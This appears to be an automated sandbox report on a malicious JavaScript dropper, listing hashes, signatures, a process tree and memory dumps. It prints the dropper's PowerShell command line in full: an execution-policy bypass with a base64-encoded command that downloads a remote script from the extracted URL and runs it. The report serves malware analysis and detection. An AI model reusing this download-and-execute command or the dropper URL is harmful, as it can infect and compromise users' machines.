Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-10-2023 03:57

General

  • Target

    ½ļ/16.js

  • Size

    32KB

  • MD5

    1b0eaa2c2511d5c5bf2fff542b172a49

  • SHA1

    bce5600d8e4bb7353b67f52a388e56063fd1ae85

  • SHA256

    2d16b8541eb251e09be8589e1d140a14f8392cc055d3b15936edcddad91b5923

  • SHA512

    e2e4ac0468a3637bdcb2598444759856f547624e07a87837ed501199947dbf1435e2fef60f66d182c72159b5a06395cb5d39411b5df9f7c3a55c2c40a8fa7511

  • SSDEEP

    384:IsDLhfkGwaE6EIWNIalL+W9zCdrnQfF+M5WHZX8thvrtVOETBFtXBRo3yhuiUhR0:XMhIzWOzQfFb5q8hfjWouiwRoz2y

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://bikexiner.lotieneconisiore.com/file1.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\½ļ\16.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" PowersheLL -eP byPASs -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAawBlAHgAaQBuAGUAcgAuAGwAbwB0AGkAZQBuAGUAYwBvAG4AaQBzAGkAbwByAGUALgBjAG8AbQAvAGYAaQBsAGUAMQAuAHAAcwAxACIAKQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP byPASs -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAawBlAHgAaQBuAGUAcgAuAGwAbwB0AGkAZQBuAGUAYwBvAG4AaQBzAGkAbwByAGUALgBjAG8AbQAvAGYAaQBsAGUAMQAuAHAAcwAxACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    fd35708ef8c43c48276378a16562d439

    SHA1

    372c10bf593d7cad8f2faf9eca3404e41a6b23a2

    SHA256

    a3437a6e90f9a18c712f4a3aac95dd060eaa948a13b1d5b29d13ebed08699f7b

    SHA512

    cc6fd48fc54ba04b0052ca6d19e1e7005f5c2e04c0a10324fe634097f89b3d19ec7303789645bed8ad3b449edea6029193338ab967d67676d71aea437bd71ac4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SNGXC9TSJXLOET5RXJ1R.temp

    Filesize

    7KB

    MD5

    fd35708ef8c43c48276378a16562d439

    SHA1

    372c10bf593d7cad8f2faf9eca3404e41a6b23a2

    SHA256

    a3437a6e90f9a18c712f4a3aac95dd060eaa948a13b1d5b29d13ebed08699f7b

    SHA512

    cc6fd48fc54ba04b0052ca6d19e1e7005f5c2e04c0a10324fe634097f89b3d19ec7303789645bed8ad3b449edea6029193338ab967d67676d71aea437bd71ac4

  • memory/2740-21-0x0000000002380000-0x0000000002400000-memory.dmp

    Filesize

    512KB

  • memory/2740-23-0x0000000002380000-0x0000000002400000-memory.dmp

    Filesize

    512KB

  • memory/2740-25-0x0000000002380000-0x0000000002400000-memory.dmp

    Filesize

    512KB

  • memory/2740-24-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp

    Filesize

    9.6MB

  • memory/2740-22-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp

    Filesize

    9.6MB

  • memory/2740-20-0x0000000002380000-0x0000000002400000-memory.dmp

    Filesize

    512KB

  • memory/2740-19-0x0000000002380000-0x0000000002400000-memory.dmp

    Filesize

    512KB

  • memory/2740-18-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-6-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

    Filesize

    32KB

  • memory/2836-7-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-5-0x000000001B310000-0x000000001B5F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2836-12-0x0000000002660000-0x00000000026E0000-memory.dmp

    Filesize

    512KB

  • memory/2836-11-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-8-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-10-0x0000000002660000-0x00000000026E0000-memory.dmp

    Filesize

    512KB

  • memory/2836-9-0x0000000002660000-0x00000000026E0000-memory.dmp

    Filesize

    512KB

  • memory/2836-26-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp

    Filesize

    9.6MB